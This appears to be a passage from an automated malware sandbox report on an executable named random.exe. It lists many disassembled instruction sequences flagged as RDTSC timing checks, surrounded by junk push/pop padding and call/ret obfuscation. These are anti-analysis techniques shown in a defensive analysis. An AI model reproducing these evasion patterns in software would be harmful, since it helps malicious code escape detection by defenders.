              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B47E second address: 43B4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007EFCE8B91D13h 0x0000000c pushad 0x0000000d jmp 00007EFCE8B91D0Fh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B70A second address: 43B70E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B70E second address: 43B743 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007EFCE8B91D25h 0x0000000f jmp 00007EFCE8B91D19h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B743 second address: 43B747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B747 second address: 43B74C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B74C second address: 43B752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43B752 second address: 43B770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007EFCE8B91D06h 0x0000000d jmp 00007EFCE8B91D11h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BA42 second address: 43BA55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFCE8B9234Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BA55 second address: 43BA60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BBCE second address: 43BBD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BCFA second address: 43BD0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BD0B second address: 43BD22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007EFCE8B9234Eh 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BD22 second address: 43BD37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFCE8B91D0Eh 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BD37 second address: 43BD5F instructions: 0x00000000 rdtsc 0x00000002 je 00007EFCE8B92346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007EFCE8B92354h 0x00000013 jnl 00007EFCE8B92346h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BD5F second address: 43BD88 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFCE8B91D06h 0x00000008 jbe 00007EFCE8B91D06h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007EFCE8B91D16h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43BD88 second address: 43BD8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43C04F second address: 43C070 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007EFCE8B91D15h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43C070 second address: 43C085 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jbe 00007EFCE8B92352h 0x0000000d jl 00007EFCE8B92346h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43C085 second address: 43C08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4301EB second address: 4301EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4301EF second address: 4301F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4301F7 second address: 4301FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43C33A second address: 43C346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43C346 second address: 43C34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43C34B second address: 43C355 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFCE8B91D20h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43CCA5 second address: 43CCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43CCAB second address: 43CCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43E723 second address: 43E729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43E729 second address: 43E72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 43E72E second address: 43E744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92351h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 441B2E second address: 441B77 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jnp 00007EFCE8B91D24h 0x00000012 mov eax, dword ptr [eax] 0x00000014 jmp 00007EFCE8B91D0Fh 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push ecx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 449702 second address: 44972F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFCE8B92355h 0x00000009 jmp 00007EFCE8B92354h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 449883 second address: 44988D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFCE8B91D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 449A22 second address: 449A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92352h 0x00000007 jmp 00007EFCE8B9234Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 449B81 second address: 449B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 449B85 second address: 449B8B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 449B8B second address: 449B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Eh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 449F0B second address: 449F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44A089 second address: 44A08F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44A08F second address: 44A093 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44A093 second address: 44A0A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007EFCE8B91D06h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44A0A8 second address: 44A0AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44AAF2 second address: 44AB04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44AB04 second address: 44AB92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007EFCE8B92346h 0x00000009 jmp 00007EFCE8B9234Ah 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 jmp 00007EFCE8B9234Ch 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b jmp 00007EFCE8B92357h 0x00000020 mov eax, dword ptr [eax] 0x00000022 ja 00007EFCE8B92360h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push ebx 0x0000002d jmp 00007EFCE8B92357h 0x00000032 pop ebx 0x00000033 pop eax 0x00000034 add di, BF57h 0x00000039 push 5E22AA4Dh 0x0000003e push eax 0x0000003f push edx 0x00000040 push ecx 0x00000041 pushad 0x00000042 popad 0x00000043 pop ecx 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44AEFB second address: 44AF12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B91D13h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44BACD second address: 44BADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44BADE second address: 44BAE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44BAE2 second address: 44BAE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44BB79 second address: 44BB7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44E641 second address: 44E6AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007EFCE8B92348h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+12451043h] 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007EFCE8B92348h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 push 00000000h 0x00000047 add di, 16C2h 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007EFCE8B9234Eh 0x00000055 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44EF4A second address: 44EF4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44EF4E second address: 44EF57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 44F9E5 second address: 44F9EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4510E3 second address: 4510EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4510EA second address: 4510F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007EFCE8B91D06h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 455715 second address: 455758 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFCE8B92358h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b xor eax, 782C6FF6h 0x00000011 mov ch, 12h 0x00000013 popad 0x00000014 push 00000000h 0x00000016 mov dword ptr [ebp+122D2B30h], edx 0x0000001c push 00000000h 0x0000001e movzx edi, di 0x00000021 push eax 0x00000022 jc 00007EFCE8B92352h 0x00000028 jp 00007EFCE8B9234Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4568F6 second address: 4568FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4568FA second address: 456923 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFCE8B92346h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFCE8B92359h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 456923 second address: 456929 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 456929 second address: 45692F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 458879 second address: 4588C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 nop 0x00000006 stc 0x00000007 push 00000000h 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007EFCE8B91D08h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push edi 0x00000028 call 00007EFCE8B91D08h 0x0000002d pop edi 0x0000002e mov dword ptr [esp+04h], edi 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc edi 0x0000003b push edi 0x0000003c ret 0x0000003d pop edi 0x0000003e ret 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4588C5 second address: 4588C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4588C9 second address: 4588CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4588CF second address: 4588D9 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFCE8B9234Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 458A19 second address: 458A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 45B8FD second address: 45B987 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFCE8B92348h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+12450BC8h], eax 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007EFCE8B92348h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 jc 00007EFCE8B92346h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push esi 0x0000003c call 00007EFCE8B92348h 0x00000041 pop esi 0x00000042 mov dword ptr [esp+04h], esi 0x00000046 add dword ptr [esp+04h], 0000001Ah 0x0000004e inc esi 0x0000004f push esi 0x00000050 ret 0x00000051 pop esi 0x00000052 ret 0x00000053 mov edi, dword ptr [ebp+122D2C03h] 0x00000059 xchg eax, esi 0x0000005a jnp 00007EFCE8B92354h 0x00000060 push eax 0x00000061 pushad 0x00000062 js 00007EFCE8B9234Ch 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 45AAC2 second address: 45AAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 45B987 second address: 45B98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 45DB3A second address: 45DB91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007EFCE8B91D0Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e add edi, dword ptr [ebp+122D3892h] 0x00000014 push 00000000h 0x00000016 adc bx, 8FF9h 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007EFCE8B91D08h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 xchg eax, esi 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jmp 00007EFCE8B91D0Eh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 45BAE6 second address: 45BAF4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 45DB91 second address: 45DB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 45BAF4 second address: 45BB07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFCE8B9234Fh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 46385A second address: 46385E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 460252 second address: 460261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 46398D second address: 463997 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFCE8B91D06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 460261 second address: 460266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 465698 second address: 46569C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 46493F second address: 464943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 463997 second address: 4639BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFCE8B91D14h 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007EFCE8B91D06h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 46569C second address: 4656A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4639BE second address: 4639C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 463ABD second address: 463AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 466743 second address: 4667BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007EFCE8B91D08h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 call 00007EFCE8B91D17h 0x00000028 mov di, E2C7h 0x0000002c pop ebx 0x0000002d or ebx, dword ptr [ebp+1245F53Eh] 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+12451034h], eax 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007EFCE8B91D08h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000018h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 xchg eax, esi 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4667BD second address: 4667C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 4667C3 second address: 4667C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 467A1F second address: 467A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 467A25 second address: 467A38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jnp 00007EFCE8B91D06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
